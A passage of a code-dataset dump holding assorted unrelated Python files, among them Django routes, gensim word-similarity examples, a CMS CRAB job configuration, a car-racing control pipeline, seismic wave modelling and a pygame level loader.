model.compile(optimizer=opt,loss='categorical_crossentropy',metrics=['categorical_accuracy'])\n\n return model","sub_path":"models/model_e_conv1d_lstm.py","file_name":"model_e_conv1d_lstm.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"358149020","text":"# [ ] create, call and test the str_analysis() function\r\n# then PASTE THIS CODE into edX\r\ndef string_analysis(a_string):\r\n if a_string.isdigit():\r\n if int(a_string) >= 99:\r\n print(a_string + ' is a pretty big number.')\r\n elif int(a_string) < 99:\r\n print(a_string + ' is a rather small number.')\r\n elif a_string.isalpha():\r\n print('\"' + a_string + '\"' + ' is all alphabetical characters.')\r\n else:\r\n print('\"' + a_string + '\"' + ' is neither all digits or all alphabetical characters.')\r\n\r\n\r\nuser_in = ''\r\n\r\nwhile user_in == '':\r\n user_in = input('Enter a word or an integer.')\r\n\r\nstring_analysis(user_in)\r\n","sub_path":"edx_codingAssignments/Module-4-StringAnalysis.py","file_name":"Module-4-StringAnalysis.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"91719538","text":"# Copyright (c) 2018, DjaoDjin inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\n# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom django.conf.urls import url\n\nfrom ...api.matrix import (MatrixCreateAPIView, MatrixDetailAPIView,\n EditableFilterListAPIView, EditableFilterDetailAPIView,\n AccountListAPIView, QuestionListAPIView)\nfrom ... import settings\n\nurlpatterns = [\n url(r'^filters/(?P%s)/?' % settings.SLUG_RE,\n EditableFilterDetailAPIView.as_view(), name='editable_filter_api'),\n url(r'^filters/?',\n EditableFilterListAPIView.as_view(), name='editable_filter_api_base'),\n url(r'^accounts/(?P%s)/?' % settings.SLUG_RE,\n AccountListAPIView.as_view(), name='accounts_api'),\n url(r'^accounts/?',\n AccountListAPIView.as_view(), name='accounts_api_base'),\n url(r'^questions/(?P%s)/?' % settings.SLUG_RE,\n QuestionListAPIView.as_view(), name='questions_api'),\n url(r'^questions/?',\n QuestionListAPIView.as_view(), name='questions_api_base'),\n url(r'^(?P%s)/?' % settings.PATH_RE,\n MatrixDetailAPIView.as_view(), name='matrix_api'),\n url(r'^',\n MatrixCreateAPIView.as_view(), name='matrix_api_base'),\n]\n","sub_path":"survey/urls/api/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"628096128","text":"# -*- coding:utf-8 -*-\n\n'''\n#@Author: Magician\n#@Date: 2020-09-22 19:23:50 \n#@Description: \n\nCopyright 2020 by Magician\n'''\n\nfrom os import name\nimport struct\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy.lib.type_check import nan_to_num\n\nimport pylab as pl\nfrom scipy import integrate\nfrom scipy.optimize import curve_fit\n\nbinFile = open('E:\\\\PET\\\\数据集\\\\6BDM.samples','rb')\npoly = binFile.read()\nprint(\"字节长度:\",len(poly))\nframe = int(len(poly)/68)+1\nprint(\"帧数:\",frame-1)\n\ncircle = 6500 # 分析多少组数据 (.xls文件的上限是65536)\n\nglobal x_rate, y_rate \nglobal popt,popt_dict\nglobal space\nglobal bounds\n\nx_rate = 1 # 将x单位进行放缩\ny_rate = 1000 # 将y单位进行放缩\nspace = 2000\npopt = []\npopt_dict = ['a','b','d']\nvoltage_threshold = [40,110,180,270,270,180,110,40]\ny = np.array(voltage_threshold)\nbounds = ([-1000,-2,0],[0,0,2])\n\nEnergy_list = []\nEnergy_mean = 21875.05167\nglobal max_value,nomrmal\nmax_value = 40000\nnormal = 511\nglobal gx_rate,gy_rate\ngx_rate = 100\ngy_rate = 1600\nglobal bins_w\nbins_w = 1000\n\ndef double_exp(x,a,b,d):\n \"\"\"双指数函数\n 参数:\n ------------\n x : float\n 当前时间与脉冲发生时间的差值\n a : float\n 由脉冲幅度决定\n b, d: float\n 由脉冲的上升和下降时间决定\n \"\"\"\n return a*np.exp(b*(x))*(1-np.exp(d*(x)))\n\ndef gaussian_singletrue(x,*param):\n '''\n 真实事件的高斯峰\n '''\n return param[1]*np.exp(-np.power(x - param[3], 2.) / (2 * np.power(param[5], 2.)))\n\ndef gaussian_2(x,*param):\n '''二元高斯函数拟合过程\n\n '''\n return param[0]*np.exp(-np.power(x - param[2], 2.) / (2 * np.power(param[4], 2.)))+\\\n param[1]*np.exp(-np.power(x - param[3], 2.) / (2 * np.power(param[5], 2.)))\n\ndef func(x):\n return popt[0]*np.exp(popt[1]*(x))*(1-np.exp(popt[2]*(x)))\n\ndef assert_popt(popt,bounds,num):\n '''检查拟合参数是否需要调整\n 参数:\n --------\n popt:拟合得到的参数\n bounds:参数范围\n num:第num+1次拟合\n '''\n for i in range(3):\n assert (popt[i]!=bounds[0][i]), \"参数%s下限值应该调整!!!\\n第%d帧数据所得双指数函数形式为:%f*exp(%f*(x))*(1-exp(%f*(x)))\"%(popt_dict[i],num+1,popt[0],popt[1],popt[2])\n assert (popt[i]!=bounds[1][i]), \"参数%s上限值应该调整!!!\\n第%d帧数据所得双指数函数形式为:%f*exp(%f*(x))*(1-exp(%f*(x)))\"%(popt_dict[i],num+1,popt[0],popt[1],popt[2])\n\ndef draw_hist(lenths):\n \n # 绘制直方图\n bins1 = np.linspace(min(lenths),max(lenths),bins_w)\n n1, bins1, patches1 = pl.hist(lenths,bins1)\n\n # 能谱归一化\n n12 = n1.tolist()\n frequent_index = n12.index(max(n12)) \n data = lenths*511/(0.5*(bins1[frequent_index]+bins1[frequent_index+1]))\n bins2 = np.linspace(min(data),max(data),bins_w)\n n2, bins2, patches2 = pl.hist(data,bins2)\n\n # 绘制高斯拟合图\n # bins比n多一个数\n # bins = np.delete(bins,-1) # 方法一:去除列表最后面的一个数\n guass_x = []\n guass_x = np.array(guass_x)\n guass_y = n2\n for i in range(len(bins2)-1): #方法二:bins需要取矩形两端端点的均值\n temp = 0.5*(bins2[i]+bins2[i+1])\n guass_x = np.append(guass_x,temp)\n popt,pcov = curve_fit(gaussian_2,guass_x/gx_rate,guass_y/gy_rate,p0=[3,4,3,6,1,1],maxfev = 140000)\n\n plt.figure(\"高斯拟合图\")\n plt.plot(guass_x,guass_y,'b*:',label='data')\n plt.plot(guass_x,gaussian_2(guass_x/gx_rate,*popt)*gy_rate,'r',label='fit')\n plt.legend()\n plt.show()\n print(\"高斯拟合的参数:\",*popt)\n\n # 计算能量分辨率\n # 将大于半高度的横坐标保存下来,并追加列表,计算列表中首尾两项的差值\n\n global half_h_w_list\n half_h_w_list = []\n high = max(gaussian_singletrue(guass_x/gx_rate,*popt)*gy_rate)\n for x in guass_x: \n if(int(gaussian_singletrue(x/gx_rate,*popt)*gy_rate)>int(0.5*high)):\n half_h_w_list = np.append(half_h_w_list,x)\n E_max = 511\n \n half_h_w = max(half_h_w_list)-min(half_h_w_list)\n eta = half_h_w/E_max\n print(\"能量分辨率为:\",eta)\n \n\n\nfor i in range(circle):\n poly_func = poly[i*68:(i+1)*68]\n content = struct.unpack(' 0.8\n#True\n\nresult = word_vectors.similar_by_word(\"cat\")\nprint(\"{}: {:.4f}\".format(*result[0]))\n#dog: 0.8798\n\nsentence_obama = 'Obama speaks to the media in Illinois'.lower().split()\nsentence_president = 'The president greets the press in Chicago'.lower().split()\n\nsimilarity = word_vectors.wmdistance(sentence_obama, sentence_president)\nprint(\"{:.4f}\".format(similarity))\n#3.4893\n\ndistance = word_vectors.distance(\"media\", \"media\")\nprint(\"{:.1f}\".format(distance))\n#0.0\n\nsim = word_vectors.n_similarity(['sushi', 'shop'], ['japanese', 'restaurant'])\nprint(\"{:.4f}\".format(sim))\n#0.7067\n\nvector = word_vectors['computer'] # numpy vector of a word\nvector.shape\n#(100,)\n\nvector = word_vectors.wv.word_vec('office', use_norm=True)\nvector.shape\n#(100,)\n\n#Correlation with human opinion on word similarity--------------------\n\nfrom gensim.test.utils import datapath\n\nsimilarities = model.wv.evaluate_word_pairs(datapath('wordsim353.tsv'))\n\n#And on word analogies\n\nanalogy_scores = model.wv.evaluate_word_analogies(datapath('questions-words.txt'))\n","sub_path":"gensim/gs_similarity.py","file_name":"gs_similarity.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"576693469","text":"\"\"\" In CRAB3 the configuration file is in Python language. It consists of creating a Configuration object imported from the WMCore library: \"\"\"\nfrom WMCore.Configuration import Configuration\nconfig = Configuration()\n\n\"\"\" Once the Configuration object is created, it is possible to add new sections into it with corresponding parameters.\"\"\"\n\nworkname='monoH_2016data'\nreqname='scalar_NLO_Mchi-450_Mphi-1000'\ndataset='/BBbarDMJets_scalar_NLO_Mchi-450_Mphi-1000_TuneCUETP8M1_13TeV-madgraph-pythia8/RunIISummer16MiniAODv2-PUMoriond17_80X_mcRun2_asymptotic_2016_TrancheIV_v6-v1/MINIAODSIM'\n\nPERIOD='H'\n\nconfig.section_(\"General\")\nconfig.General.requestName = reqname\nconfig.General.workArea = 'crab_'+workname\nconfig.General.transferOutputs = True\nconfig.General.transferLogs = True\n\nDATAJEC='Summer16_23Sep2016'+PERIOD+'V3_DATA'\n\nconfig.section_(\"JobType\")\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = 'treeMaker_Summer17_cfg.py'\nconfig.JobType.pyCfgParams = ['runOnMC=False','period='+PERIOD]\nconfig.JobType.inputFiles = ['effAreaElectrons_cone03_pfNeuHadronsAndPhotons_25ns.txt','effAreasMuons_cone03_Spring15_25ns.txt',\n'../../../MetaData/data/DNN_models/breg_training_2017.pb',\n'../../TreeMaker/data/BoostedSVDoubleCA15_withSubjet_v4.weights.xml']\n\nconfig.JobType.sendExternalFolder = True\nconfig.JobType.sendPythonFolder = True\n\nconfig.section_(\"Data\")\nconfig.Data.inputDataset = dataset\nconfig.Data.inputDBS = 'global'\nconfig.Data.outputDatasetTag = reqname\nconfig.Data.splitting = 'LumiBased'\n#config.Data.splitting = 'Automatic'\n\nconfig.Data.unitsPerJob = 20\n\n#config.Data.lumiMask = 'https://cms-service-dqm.web.cern.ch/cms-service-dqm/CAF/certification/Collisions16/13TeV/ReReco/Final/Cert_271036-284044_13TeV_23Sep2016ReReco_Collisions16_JSON.txt'\nconfig.Data.lumiMask = 'Cert_294927-306462_13TeV_PromptReco_Collisions17_JSON.txt'#'Cert_271036-284044_13TeV_23Sep2016ReReco_Collisions16_JSON.txt'\n#config.Data.ignoreLocality = True\n\n\nconfig.JobType.allowUndistributedCMSSW=True\n\n\n#maxtarballsize = 50 \nconfig.section_(\"Site\")\n#config.Site.storageSite = \"T3_TW_NCU\"\nconfig.Site.storageSite = \"T2_CH_CERN\"\n##config.Site.storageSite = \"T2_US_Wisconsin\" \n#config.Site.storageSite = \"T2_TW_NCHC\" \n\nconfig.Data.outLFNDirBase = '/store/group/phys_exotica/bbMET/2017_ntuples/%s' %(workname) \n","sub_path":"CrabUtilities/MultiCrab/crabConfig_data.py","file_name":"crabConfig_data.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"452886593","text":"import os\nimport sys\nimport gym\nfrom gym.envs.box2d.car_racing import CarRacing\nfrom lane_detection import LaneDetection\nfrom waypoint_prediction import waypoint_prediction, target_speed_prediction\nfrom lateral_control import LateralController\nfrom longitudinal_control import LongitudinalController\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pyglet\nfrom pyglet import gl\nfrom pyglet.window import key\n\n\ndef evaluate():\n \"\"\"\n \"\"\"\n\n # action variables\n a = np.array( [0.0, 0.0, 0.0] )\n\n # init environement\n env = CarRacing()\n env.render()\n env.reset()\n\n\n for episode in range(5):\n observation = env.reset()\n # init modules of the pipeline\n LD_module = LaneDetection()\n LatC_module = LateralController()\n LongC_module = LongitudinalController()\n reward_per_episode = 0\n for t in range(500):\n # perform step\n s, r, done, speed, info = env.step(a)\n\n # lane detection\n lane1, lane2 = LD_module.lane_detection(s)\n\n # waypoint and target_speed prediction\n waypoints = waypoint_prediction(lane1, lane2)\n target_speed = target_speed_prediction(waypoints, max_speed=60, exp_constant=4.5)\n\n # control\n a[0] = LatC_module.stanley(waypoints, speed)\n a[1], a[2] = LongC_module.control(speed, target_speed)\n\n # reward\n reward_per_episode += r\n env.render()\n\n print('episode %d \\t reward %f' % (episode, reward_per_episode))\n\n\n\ndef calculate_score_for_leaderboard():\n \"\"\"\n Evaluate the performance of the network. This is the function to be used for\n the final ranking on the course-wide leader-board, only with a different set\n of seeds. Better not change it.\n \"\"\"\n # action variables\n a = np.array( [0.0, 0.0, 0.0] )\n\n # init environement\n env = CarRacing()\n env.render()\n env.reset()\n\n seeds = [22597174, 68545857, 75568192, 91140053, 86018367,\n 49636746, 66759182, 91294619, 84274995, 31531469]\n\n\n total_reward = 0\n\n for episode in range(10):\n env.seed(seeds[episode])\n observation = env.reset()\n\n # init modules of the pipeline\n LD_module = LaneDetection()\n LatC_module = LateralController()\n LongC_module = LongitudinalController()\n\n reward_per_episode = 0\n for t in range(600):\n # perform step\n s, r, done, speed, info = env.step(a)\n\n # lane detection\n lane1, lane2 = LD_module.lane_detection(s)\n\n # waypoint and target_speed prediction\n waypoints = waypoint_prediction(lane1, lane2)\n target_speed = target_speed_prediction(waypoints, max_speed=60, exp_constant=4.5)\n\n # control\n a[0] = LatC_module.stanley(waypoints, speed)\n a[1], a[2] = LongC_module.control(speed, target_speed)\n\n # reward\n reward_per_episode += r\n\n env.render()\n\n print('episode %d \\t reward %f' % (episode, reward_per_episode))\n total_reward += np.clip(reward_per_episode, 0, np.infty)\n\n print('---------------------------')\n print(' total score: %f' % (total_reward / 10))\n print('---------------------------')\n\nif __name__ == \"__main__\":\n if sys.argv[1] == \"test\":\n evaluate()\n elif sys.argv[1] == \"score\":\n if len(sys.argv) == 3:\n trained_network_file = os.path.join(directory, sys.argv[2])\n calculate_score_for_leaderboard(trained_network_file)\n else:\n calculate_score_for_leaderboard()\n else:\n print('This command is not supported, use '\n 'test or score.')\n","sub_path":"exercise_03_modular_pipeline/template/modular_pipeline.py","file_name":"modular_pipeline.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"134460118","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\n\ndef ricker(f=None, n=None, dt=None, t0=None, t1=None):\n \"\"\"\n RICKER creates an causal ricker wavelet signal\n\n RICKER creates and plots a default causal ricker wavelet with:\n\n peak frequency = 20 Hz\n sampling time = 0.001 seconds\n number of points = 100;\n peak location = 1/F = 1/20Hz\n\n RW = RICKER(...) returns the default wavelet in RW.\n\n [RW,T] = RICKER(...) returns the time vector in T.\n\n Specifying parameters of peak frequency (F, Hz), number of points (N),\n and sampling time (DT) are specified by the syntax:\n\n [RW,T] = RICKER(F)\n [RW,T] = RICKER(F,N)\n [RW,T] = RICKER(F,N,DT)\n\n [RW,T] = RICKER(F,N,DT,T0) creates a ricker wavelet with peak centered\n at T0.\n\n [RW,T] = RICKER(F,N,DT,T0,T1) creates a 2 dimensional symmetric\n ricker wavelet with sift in 1st dimension of T0 and second dimension of\n T1.\n\n Example 1:\n ricker % plots a 20 Hz Ricker Wavelet over 0.1 seconds\n\n Example 2:\n % create a ricker wavelet with 40 Hz, 200 points, and 0.02 s between\n % samples\n [rw,t] = ricker(40,200,0.002);\n plot(t,rw), xlabel('Time'), ylabel('Amplitude')\n \"\"\"\n # Define inputs if needed\n\n if f and n and dt and t0:\n if t1 is not None:\n is2d = True\n else:\n is2d = False\n elif f and n and dt:\n t0 = 1/float(f)\n is2d = False\n elif f and n:\n dt = 0.001\n t0 = 1/float(f)\n is2d = False\n elif f:\n n = 100\n dt = 0.001\n t0 = 1/float(f)\n is2d = False\n else:\n f = 20.\n n = 100\n dt = 0.001\n t0 = 1/f\n is2d = False\n\n # Create the wavelet and shift in time if needed\n T = dt*(n-1)\n t = np.arange(0, T+dt, dt)\n tau = t-t0\n if not is2d:\n rw = (\n (1-tau * tau * f**2. * np.pi**2.) *\n np.exp(-tau**2. * np.pi**2. * f**2.)\n )\n else:\n t1, t2 = np.meshgrid(tau, t-t1)\n rw = (\n (1-(t1**2. + t2**2.) * f**2. * np.pi**2.) *\n np.exp(-(t1**2. + t2**2.) * np.pi**2. * f**2.)\n )\n\n return rw, t\n\n\ndef generate_shots(Vp, Vm, Vm0, dt, nt, dx=24, dz=24, animation=True):\n f = 60.\n nz, nx = Vp.shape[:]\n x = np.arange(1, nx+1) * dx\n z = np.arange(1, nz+1) * dz\n\n data = np.zeros((nt, nx))\n\n if animation:\n fig = plt.figure()\n ax = range(4)\n cbar = range(3)\n clim = [-1000, 1000]\n\n ax[0] = plt.subplot2grid((5, 5), (0, 0), colspan=2, rowspan=2)\n ax[1] = plt.subplot2grid((5, 5), (0, 3), colspan=2, rowspan=2)\n ax[2] = plt.subplot2grid((5, 5), (3, 0), colspan=2, rowspan=2)\n ax[3] = plt.subplot2grid((5, 5), (3, 3), colspan=2, rowspan=2)\n\n # subplot(2,2,1)\n iVp = ax[0].imshow(Vp, extent=(dx, nx*dx, nz*dz, dz), cmap='seismic')\n ax[0].plot(x[0], z[0], 'x')\n ax[0].plot(x[0], z[0], '^', color='white')\n ax[0].set_title('c(x)')\n ax[0].set_xlabel('Distance (m)')\n ax[0].set_xlim(dx, nx*dx)\n ax[0].set_ylabel('Depth (m)')\n ax[0].set_ylim(nz*dz, 0)\n cbar[0] = fig.colorbar(iVp, ax=ax[0])\n\n nxi = 1\n for ixs in range(21, 22+nxi): # shot loop\n # initial wavefield\n rw, t = ricker(f, nz+40, dt, dt*ixs, 0)\n rw = rw[0:nz+20]\n\n # generate shot records\n tic = time.time()\n [data, snapshot] = fm2d(Vm, rw, nz, dz, nx, dx, nt, dt)\n toc = time.time()\n msg = \"Elapsed time is %s seconds.\" % (toc-tic)\n print(msg)\n\n tic = time.time()\n [data0, snapshot0] = fm2d(Vm0, rw, nz, dz, nx, dx, nt, dt)\n toc = time.time()\n msg = \"Elapsed time is %s seconds.\" % (toc-tic)\n print(msg)\n\n # data = data(21:end-20,:)'\n # data0 = data0(21:end-20,:)'\n # dataS = data - data0\n\n # save(['Marmousi/snapshot0',num2str(ixs-20),'.mat'],'snapshot0');\n # save(['Marmousi/shotfdm',num2str(ixs-20),'.mat'],'data')\n # save(['Marmousi/shotfdmS',num2str(ixs-20),'.mat'],'dataS')\n\n # plot initial wavefield\n \"\"\"\n set(hshot,'XData',x(ixs-20),'YData',z(1));\n subplot(2,2,2)\n imagesc(x,z,rw(1:end-20,21:end-20))\n xlabel('Distance (m)'); ylabel('Depth (m)');\n title(['Shot ',num2str(ixs-20),' at ',num2str(x(ixs-20)),' m']);\n colormap(seismic(1024))\n\n if ismember(ixs-20,[1 nx/2 nx])\n start = 1;\n else\n start = nt;\n end\n\n for i = start:10:nt\n % plot shot record evolution\n ds = zeros(nt,nx);\n ds(1:i,:) = data(1:i,:);\n subplot(2,2,3)\n imagesc(x,t,ds)\n xlabel('Distance (m)'), ylabel('Time (s)')\n title('Shot Record')\n %caxis([-0.5 0.5]) % this for layered model\n caxis([-5 5]) % this for Marmousi model\n\n % plot wave propagation\n subplot(2,2,4)\n imagesc(x,z,snapshot(1:end-20,21:end-20,i))\n xlabel('Distance (m)'), ylabel('Depth (m)')\n title(['Wave Propagation t = ',num2str(t(i),'%10.3f')])\n %caxis([-5 5]) % this for layered model\n caxis([-50 50]) % this for Marmousi model\n\n\n drawnow;\n end\n end %shot loop\n \"\"\"\n return\n\n\ndef fm2d(v, model, nz, dz, nx, dx, nt, dt):\n \"\"\"\n model(nz,nx) model vector\n v(nz,nx) velocity model\n nx number of horizontal samples\n nz number of depth samples\n nt numer of time samples\n dx horizontal distance per sample\n dz depth distance per sample\n dt time difference per sample\n \"\"\"\n # add grid points for boundary condition\n # model = [repmat(model(:,1),1,20), model, repmat(model(:,end),1,20)];\n # model(end+20,:) = model(end,:);\n\n # v = [repmat(v(:,1),1,20), v, repmat(v(:,end),1,20)];\n # v(end+20,:) = v(end,:);\n\n # Initialize storage\n nz, nx = model.shape\n data = np.zeros((nx, nt))\n fdm = np.zeros((nz, nx, 3))\n\n # Boundary Absorbing Model\n iz = np.arange(1, 21)\n boundary = (np.exp(-((0.005 * (20-iz))**2)))**10.\n boundary = boundary.transpose()\n\n # Forward-Time Modeling\n fdm = np.array((model, model))\n data[:, 0] = model[0, :]\n\n # finite difference coefficients\n a = (v*dt/dx)**2 # wave equation coefficient\n b = 2-4*a\n\n # common indicies\n iz = np.arange(2, nz) # interior z\n ix = np.arange(2, nx) # interior x\n izb = np.arange(1, nz-19) # boundary z\n\n snapshot = np.zeros((nz, nx, nt))\n\n for it in np.arange(2, nt):\n # finite differencing on interior\n fdm[iz, ix, 2] = (\n b[iz, ix] * fdm[iz, ix, 1] - fdm[iz, ix, 0] +\n a[iz, ix] * (fdm[iz, ix+1, 1] + fdm[iz, ix-1, 1] +\n fdm[iz+1, ix, 1] + fdm[iz-1, ix, 1])\n )\n\n # finite differencing at ix = 1 and ix = nx (surface, bottom)\n fdm[iz, 0, 2] = (\n b[iz, 0] * fdm[iz, 0, 1] - fdm[iz, 0, 0] +\n a[iz, 0] * (fdm[iz, 1, 1] + fdm[iz+1, 0, 1] +\n fdm[iz-1, 0, 1])\n )\n\n fdm[iz, nx, 2] = (\n b[iz, nx] * fdm[iz, nx, 1] - fdm[iz, nx, 0] +\n a[iz, nx] * (fdm[iz, nx-1, 1] + fdm[iz+1, nx, 1] +\n fdm[iz-1, nx, 1])\n )\n\n # finite differencing at iz = 1 and iz = nz (z boundaries)\n fdm[0, ix, 2] = (\n b[0, ix] * fdm[0, ix, 1] - fdm[0, ix, 0] +\n a[0, ix] * (fdm[1, ix, 1] + fdm[0, ix+1, 1] +\n fdm[0, ix-1, 1])\n )\n\n fdm[nz, ix, 2] = (\n b[nz, ix] * fdm[nz, ix, 1] - fdm[nz, ix, 0] +\n a[nz, ix] * (fdm[nz-1, ix, 1] + fdm[nz, ix+1, 1] +\n fdm[nz, ix-1, 1])\n )\n\n # finite differencing at four corners (1,1), (nz,1), (1,nx), (nz,nx)\n fdm[0, 0, 2] = (\n b[0, 0] * fdm[0, 0, 1] - fdm[0, 0, 0] +\n a[0, 0] * (fdm[1, 0, 1] + fdm[0, 1, 1])\n )\n fdm[nz, 0, 2] = (\n b[nz, 0] * fdm[nz, 0, 1] - fdm[nz, 0, 0] +\n a[nz, 1] * (fdm[nz, 1, 1] + fdm[nz-1, 0, 1])\n )\n fdm[0, nx, 2] = (\n b[0, nx] * fdm[0, nx, 1] - fdm[0, nx, 0] +\n a[0, nx] * (fdm[0, nx-1, 1] + fdm[2, nx, 1])\n )\n fdm[nz, nx, 2] = (\n b[nz, nx] * fdm[nz, nx, 0] - fdm[nz, nx, 0] +\n a[nz, nx] * (fdm[nz-1, nx, 1] + fdm[nz, nx-1, 1])\n )\n\n # update fdm for next time iteration\n fdm[:, :, 0] = fdm[:, :, 1]\n fdm[:, :, 1] = fdm[:, :, 2]\n\n # apply absorbing boundary conditions to 3 sides (not surface)\n for ixb in range(1, 21):\n fdm[izb, ixb, 0] = boundary[ixb] * fdm[izb, ixb, 0]\n fdm[izb, ixb, 1] = boundary[ixb] * fdm[izb, ixb, 1]\n ixb2 = nx-20+ixb\n fdm[izb, ixb2, 0] = boundary[nx-ixb2+1] * fdm[izb, ixb2, 0]\n fdm[izb, ixb2, 1] = boundary[nx-ixb2+1] * fdm[izb, ixb2, 1]\n izb2 = nz-20+ixb\n fdm[izb2, :, 0] = boundary[nz-izb2+1] * fdm[izb2, :, 0]\n fdm[izb2, :, 1] = boundary[nz-izb2+1] * fdm[izb2, :, 1]\n\n # update data\n data[:, it] = fdm[0, :, 1]\n\n snapshot[:, :, it] = fdm[:, :, 1]\n\n data = data[21:nx-20, :]\n\n return data, snapshot\n","sub_path":"RTM_imaging/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":10219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"104069493","text":"from django.shortcuts import render\nfrom store.models import Product, BestProduct, TrendingProduct\n\ndef home(request):\n products = Product.objects.all().filter(is_available=True)\n bestProduct = BestProduct.objects.all().filter(is_available=True)\n trendProducts = TrendingProduct.objects.all().filter(is_available=True)\n\n context = {\n 'products' : products,\n 'bestProduct' : bestProduct,\n 'trendProducts': trendProducts,\n }\n return render(request, 'home.html', context)\n","sub_path":"Ecarts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"654086815","text":"\"\"\" Setup file. \"\"\"\n\nfrom setuptools import find_packages, setup\n\nwith open(\"README.rst\", \"r\") as readme_file:\n README = readme_file.read()\n\nversion = {}\nwith open(\"src/matching/version.py\", \"r\") as f:\n exec(f.read(), version)\n\nsetup(\n name=\"matching\",\n version=version[\"__version__\"],\n description=\"A package for solving matching games.\",\n long_description=README,\n url=\"https://github.com/daffidwilde/matching\",\n author=\"Henry Wilde\",\n author_email=\"henrydavidwilde@gmail.com\",\n license=\"MIT\",\n keywords=[\"game-theory gale-shapley matching-games\"],\n packages=find_packages(\"src\"),\n package_dir={\"\": \"src\"},\n python_requires=\">=3.5\",\n tests_require=[\"pytest\", \"hypothesis\", \"numpy\"],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"345682174","text":"#!/usr/bin/env python\n'''\nCreated on Nov 27, 2012\n\n@author: Robert Rouhani\n@copyright: Copyright (c) 2012, Robert Rouhani\n\n@license: MIT\n@version: 0.1\n'''\n\nimport pygame\nimport entities\n\nclass Tile(object):\n def __init__(self, rect):\n self.rect = rect\n self.name = \"\"\n \n def get_rect(self):\n return self.rect\n\nclass Level(object):\n def __init__(self, path):\n self.tileset = pygame.image.load(\"../assets/img/tileset.png\").convert_alpha()\n self.spawn_x = 0\n self.spawn_y = 0\n \n lines = [line.rstrip() for line in open(path)]\n \n startmapdata = 0\n mapsize_x = 0\n mapsize_y = 0\n \n self.entities = []\n self.colliders = []\n \n for i,line in enumerate(lines):\n lineinfo = line.split(' ')\n if lineinfo[0] == \"spawn\":\n self.spawn_x = int(lineinfo[1])\n self.spawn_y = int(lineinfo[2])\n elif lineinfo[0] == \"button\":\n btn = entities.Button(int(lineinfo[1]), int(lineinfo[2]), lineinfo[3] == \"1\", lineinfo[4])\n for name in lineinfo[5:]:\n btn.connected.append(next(e for e in self.entities if e.name == name))\n self.entities.append(btn)\n elif lineinfo[0] == \"slidingblock\":\n self.entities.append(entities.SlidingBlock(int(lineinfo[1]), int(lineinfo[2]), lineinfo[3] == \"1\", lineinfo[4]))\n elif lineinfo[0] == \"floorbutton\":\n btn = entities.FloorButton(int(lineinfo[1]), int(lineinfo[2]), lineinfo[3])\n for name in lineinfo[4:]:\n btn.connected.append(next(e for e in self.entities if e.name == name))\n elif lineinfo[0] == \"spike\":\n self.entities.append(entities.Spike(int(lineinfo[1]), int(lineinfo[2]), int(lineinfo[3]), int(lineinfo[4]), lineinfo[5]))\n elif lineinfo[0] == \"levelend\":\n self.entities.append(entities.LevelEnd(int(lineinfo[1]), int(lineinfo[2]), lineinfo[3]))\n elif lineinfo[0] == \"counter\":\n ct = entities.Counter(int(lineinfo[1]), lineinfo[2])\n for name in lineinfo[3:]:\n ct.connected.append(next(e for e in self.entities if e.name == name))\n self.entities.append(ct)\n elif lineinfo[0] == \"mapinfo\":\n mapsize_x = int(lineinfo[1])\n mapsize_y = int(lineinfo[2])\n startmapdata = i + 1\n break\n \n self.map_surface = pygame.Surface((mapsize_x * 32, mapsize_y * 32), pygame.SRCALPHA)\n \n for i,row in enumerate(lines[startmapdata:]):\n for j,col in enumerate(row):\n if col == 'n': #blank tiles\n continue\n elif col.isdigit() or col in ('a', 'b', 'c', 'd', 'e', 'f'):\n num=int(col, 16)\n if 0 <= num <= 15:\n tile_rect = pygame.rect.Rect(((num 